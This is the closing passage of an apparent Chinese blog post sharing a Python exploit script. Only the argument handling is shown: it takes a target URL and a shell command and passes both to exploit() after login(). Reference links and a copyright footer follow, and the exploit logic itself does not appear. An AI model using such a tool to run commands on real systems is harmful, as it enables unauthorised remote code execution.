parser.add_argument("-u",metavar="url",type=str,help="url there, e.g: http://127.0.0.1:5678/")
parser.add_argument("-c",metavar="command",type=str,help="execute command, e.g: ls")
# print(sys.argv[1:])
args = vars( parser.parse_args(sys.argv[1:]) )
url = args["u"]
command = args["c"]
exploit(url,login(url),command)
https://www.secquan.org/Discuss/1071932#reply3
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
https://github.com/Esonhugh/JD-Freefuckfucker
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容